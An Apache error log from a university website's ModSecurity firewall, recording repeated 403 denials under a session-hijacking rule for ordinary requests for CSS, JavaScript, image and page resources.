[Mon Aug 28 08:27:49.479357 2023] [:error] [pid 38059] [client 114.142.173.4] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext_plugins/statusbar/css/statusbar.css"] [unique_id "ZOv4FcCo-f0AAJSr26IAAAAO"]
[Mon Aug 28 08:27:49.480128 2023] [:error] [pid 38462] [client 114.142.173.4] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/css/Spinner.css"] [unique_id "ZOv4FcCo-f0AAJY@OnIAAAAB"]
[Mon Aug 28 08:27:49.481259 2023] [:error] [pid 38379] [client 114.142.173.4] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/data-view.css"] [unique_id "ZOv4FcCo-f0AAJXrItkAAAAP"]
[Mon Aug 28 08:27:49.519110 2023] [:error] [pid 38389] [client 114.142.173.4] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/fileuploadfield.css"] [unique_id "ZOv4FcCo-f0AAJX1kiYAAAAS"]
[Mon Aug 28 08:27:49.535675 2023] [:error] [pid 38149] [client 114.142.173.4] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/examples.css"] [unique_id "ZOv4FcCo-f0AAJUFNegAAAAA"]
[Mon Aug 28 08:27:49.544989 2023] [:error] [pid 38386] [client 114.142.173.4] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/tabs.css"] [unique_id "ZOv4FcCo-f0AAJXyN8oAAAAM"]
[Mon Aug 28 08:27:49.589343 2023] [:error] [pid 38059] [client 114.142.173.4] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/icons/silk.css"] [unique_id "ZOv4FcCo-f0AAJSr26MAAAAO"]
[Mon Aug 28 08:27:49.598309 2023] [:error] [pid 38379] [client 114.142.173.4] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/treegrid/treegrid.css"] [unique_id "ZOv4FcCo-f0AAJXrItoAAAAP"]
[Mon Aug 28 08:27:49.614867 2023] [:error] [pid 38389] [client 114.142.173.4] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery-1.4.4.min.js"] [unique_id "ZOv4FcCo-f0AAJX1kicAAAAS"]
[Mon Aug 28 08:27:49.615024 2023] [:error] [pid 38386] [client 114.142.173.4] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/scripts.js"] [unique_id "ZOv4FcCo-f0AAJXyN8sAAAAM"]
[Mon Aug 28 08:27:49.618302 2023] [:error] [pid 38462] [client 114.142.173.4] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.ScrollTo.js"] [unique_id "ZOv4FcCo-f0AAJY@OnMAAAAB"]
[Mon Aug 28 08:27:49.649605 2023] [:error] [pid 38149] [client 114.142.173.4] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/AC_RunActiveContent.js"] [unique_id "ZOv4FcCo-f0AAJUFNekAAAAA"]
[Mon Aug 28 08:27:49.691555 2023] [:error] [pid 38059] [client 114.142.173.4] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.mousewheel-3.0.4.pack.js"] [unique_id "ZOv4FcCo-f0AAJSr26QAAAAO"]
[Mon Aug 28 08:27:49.746274 2023] [:error] [pid 38389] [client 114.142.173.4] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.fancybox.settings.js"] [unique_id "ZOv4FcCo-f0AAJX1kigAAAAS"]
[Mon Aug 28 08:27:49.746618 2023] [:error] [pid 38059] [client 114.142.173.4] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.fancybox-1.3.4.js"] [unique_id "ZOv4FcCo-f0AAJSr26UAAAAO"]
[Mon Aug 28 08:27:49.748107 2023] [:error] [pid 38379] [client 114.142.173.4] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/ddsmoothmenu.js"] [unique_id "ZOv4FcCo-f0AAJXrItsAAAAP"]
[Mon Aug 28 08:27:49.748827 2023] [:error] [pid 38462] [client 114.142.173.4] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/cufon-yui.js"] [unique_id "ZOv4FcCo-f0AAJY@OnQAAAAB"]
[Mon Aug 28 08:27:49.750723 2023] [:error] [pid 38149] [client 114.142.173.4] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/Sansation_300-Sansation_700.font.js"] [unique_id "ZOv4FcCo-f0AAJUFNeoAAAAA"]
[Mon Aug 28 08:27:49.815122 2023] [:error] [pid 38386] [client 114.142.173.4] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/ddsmoothmenu.settings.js"] [unique_id "ZOv4FcCo-f0AAJXyN8wAAAAM"]
[Mon Aug 28 08:27:49.866016 2023] [:error] [pid 38379] [client 114.142.173.4] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.nivo.slider.pack.js"] [unique_id "ZOv4FcCo-f0AAJXrItwAAAAP"]
[Mon Aug 28 08:27:49.867020 2023] [:error] [pid 38389] [client 114.142.173.4] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.nivo.slider.settings.js"] [unique_id "ZOv4FcCo-f0AAJX1kikAAAAS"]
[Mon Aug 28 08:27:49.868452 2023] [:error] [pid 38059] [client 114.142.173.4] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/aslider.js"] [unique_id "ZOv4FcCo-f0AAJSr26YAAAAO"]
[Mon Aug 28 08:27:49.868917 2023] [:error] [pid 38386] [client 114.142.173.4] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/slidingboxes.js"] [unique_id "ZOv4FcCo-f0AAJXyN80AAAAM"]
[Mon Aug 28 08:27:49.869433 2023] [:error] [pid 38462] [client 114.142.173.4] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/supersleight.plugin.js"] [unique_id "ZOv4FcCo-f0AAJY@OnUAAAAB"]
[Mon Aug 28 08:27:49.926193 2023] [:error] [pid 38149] [client 114.142.173.4] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/styleswitch.js"] [unique_id "ZOv4FcCo-f0AAJUFNesAAAAA"]
[Mon Aug 28 08:27:49.994769 2023] [:error] [pid 38389] [client 114.142.173.4] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/adapter/ext/ext-base.js"] [unique_id "ZOv4FcCo-f0AAJX1kioAAAAS"]
[Mon Aug 28 08:27:49.994772 2023] [:error] [pid 38379] [client 114.142.173.4] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/application/frontend/store/DataMasterPublic.js"] [unique_id "ZOv4FcCo-f0AAJXrIt0AAAAP"]
[Mon Aug 28 08:27:49.995769 2023] [:error] [pid 38149] [client 114.142.173.4] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ext-all.js"] [unique_id "ZOv4FcCo-f0AAJUFNewAAAAA"]
[Mon Aug 28 08:27:49.996369 2023] [:error] [pid 38462] [client 114.142.173.4] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/application/frontend/pendaftaran/verifikasipmb_form.js"] [unique_id "ZOv4FcCo-f0AAJY@OnYAAAAB"]
[Mon Aug 28 08:27:49.998092 2023] [:error] [pid 38386] [client 114.142.173.4] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/application/frontend/find_m.js"] [unique_id "ZOv4FcCo-f0AAJXyN84AAAAM"]
[Mon Aug 28 08:27:50.046882 2023] [:error] [pid 38059] [client 114.142.173.4] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/resources/css/ext-all.css"] [unique_id "ZOv4FsCo-f0AAJSr26cAAAAO"]
[Mon Aug 28 08:27:50.086320 2023] [:error] [pid 38389] [client 114.142.173.4] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/resources/css/xtheme-gray.css"] [unique_id "ZOv4FsCo-f0AAJX1kisAAAAS"]
[Mon Aug 28 08:27:50.097710 2023] [:error] [pid 38059] [client 114.142.173.4] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext_plugins/statusbar/css/statusbar.css"] [unique_id "ZOv4FsCo-f0AAJSr26gAAAAO"]
[Mon Aug 28 08:27:50.107675 2023] [:error] [pid 38149] [client 114.142.173.4] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/css/Spinner.css"] [unique_id "ZOv4FsCo-f0AAJUFNe0AAAAA"]
[Mon Aug 28 08:27:50.109157 2023] [:error] [pid 38462] [client 114.142.173.4] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/data-view.css"] [unique_id "ZOv4FsCo-f0AAJY@OncAAAAB"]
[Mon Aug 28 08:27:50.124504 2023] [:error] [pid 38379] [client 114.142.173.4] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/fileuploadfield.css"] [unique_id "ZOv4FsCo-f0AAJXrIt4AAAAP"]
[Mon Aug 28 08:27:50.140802 2023] [:error] [pid 38386] [client 114.142.173.4] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/examples.css"] [unique_id "ZOv4FsCo-f0AAJXyN88AAAAM"]
[Mon Aug 28 08:27:50.169440 2023] [:error] [pid 38389] [client 114.142.173.4] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/tabs.css"] [unique_id "ZOv4FsCo-f0AAJX1kiwAAAAS"]
[Mon Aug 28 08:27:50.215251 2023] [:error] [pid 38059] [client 114.142.173.4] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/icons/silk.css"] [unique_id "ZOv4FsCo-f0AAJSr26kAAAAO"]
[Mon Aug 28 08:27:50.216049 2023] [:error] [pid 38149] [client 114.142.173.4] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/Ext.ux.grid.Search.js"] [unique_id "ZOv4FsCo-f0AAJUFNe4AAAAA"]
[Mon Aug 28 08:27:50.217657 2023] [:error] [pid 38462] [client 114.142.173.4] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/treegrid/treegrid.css"] [unique_id "ZOv4FsCo-f0AAJY@OngAAAAB"]
[Mon Aug 28 08:27:50.224680 2023] [:error] [pid 38379] [client 114.142.173.4] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/form/NumberField.js"] [unique_id "ZOv4FsCo-f0AAJXrIt8AAAAP"]
[Mon Aug 28 08:27:50.226187 2023] [:error] [pid 38389] [client 114.142.173.4] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/application/frontend/website/ftracerstudy.js"] [unique_id "ZOv4FsCo-f0AAJX1ki0AAAAS"]
[Mon Aug 28 08:27:50.347752 2023] [:error] [pid 38386] [client 114.142.173.4] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/menu.css"] [unique_id "ZOv4FsCo-f0AAJXyN9AAAAAM"]
[Mon Aug 28 08:27:50.358695 2023] [:error] [pid 38149] [client 114.142.173.4] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/dark.css"] [unique_id "ZOv4FsCo-f0AAJUFNe8AAAAA"]
[Mon Aug 28 08:27:50.394733 2023] [:error] [pid 38379] [client 114.142.173.4] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/blue.css"] [unique_id "ZOv4FsCo-f0AAJXrIuAAAAAP"]
[Mon Aug 28 08:27:50.395362 2023] [:error] [pid 38462] [client 114.142.173.4] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/green.css"] [unique_id "ZOv4FsCo-f0AAJY@OnkAAAAB"]
[Mon Aug 28 08:27:50.403409 2023] [:error] [pid 38059] [client 114.142.173.4] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/style100.css"] [unique_id "ZOv4FsCo-f0AAJSr26oAAAAO"]
[Mon Aug 28 08:27:50.403449 2023] [:error] [pid 38389] [client 114.142.173.4] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/bg.css"] [unique_id "ZOv4FsCo-f0AAJX1ki4AAAAS"]
[Mon Aug 28 08:27:50.447065 2023] [:error] [pid 38386] [client 114.142.173.4] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/dark100.css"] [unique_id "ZOv4FsCo-f0AAJXyN9EAAAAM"]
[Mon Aug 28 08:27:50.463350 2023] [:error] [pid 38462] [client 114.142.173.4] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/blue100.css"] [unique_id "ZOv4FsCo-f0AAJY@OnoAAAAB"]
[Mon Aug 28 08:27:50.478892 2023] [:error] [pid 38059] [client 114.142.173.4] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/green100.css"] [unique_id "ZOv4FsCo-f0AAJSr26sAAAAO"]
[Mon Aug 28 08:27:50.515955 2023] [:error] [pid 38379] [client 114.142.173.4] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/bg100.css"] [unique_id "ZOv4FsCo-f0AAJXrIuEAAAAP"]
[Mon Aug 28 08:27:50.935066 2023] [:error] [pid 38389] [client 114.142.173.4] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/icon.png"] [unique_id "ZOv4FsCo-f0AAJX1ki8AAAAS"]
[Mon Aug 28 08:28:42.924157 2023] [:error] [pid 38065] [client 114.5.210.88] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/index"] [unique_id "ZOv4SsCo-f0AAJSxY8MAAAAH"]
[Mon Aug 28 08:28:43.103409 2023] [:error] [pid 38059] [client 114.5.210.88] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv4S8Co-f0AAJSr260AAAAO"]
[Mon Aug 28 08:28:44.757163 2023] [:error] [pid 37539] [client 114.142.173.4] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/web/content/detail/3"] [unique_id "ZOv4TMCo-f0AAJKjaK4AAAAG"]
[Mon Aug 28 08:28:45.117634 2023] [:error] [pid 38338] [client 114.142.173.4] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv4TcCo-f0AAJXCvwsAAAAJ"]
[Mon Aug 28 08:28:46.348052 2023] [:error] [pid 38462] [client 114.5.210.88] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/index"] [unique_id "ZOv4TsCo-f0AAJY@OnwAAAAB"]
[Mon Aug 28 08:28:46.500074 2023] [:error] [pid 38389] [client 114.5.210.88] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv4TsCo-f0AAJX1kjIAAAAS"]
[Mon Aug 28 08:28:47.200120 2023] [:error] [pid 38059] [client 114.142.173.4] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/web/content/prosedurpmb/"] [unique_id "ZOv4T8Co-f0AAJSr264AAAAO"]
[Mon Aug 28 08:28:47.462242 2023] [:error] [pid 38059] [client 114.142.173.4] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv4T8Co-f0AAJSr268AAAAO"]
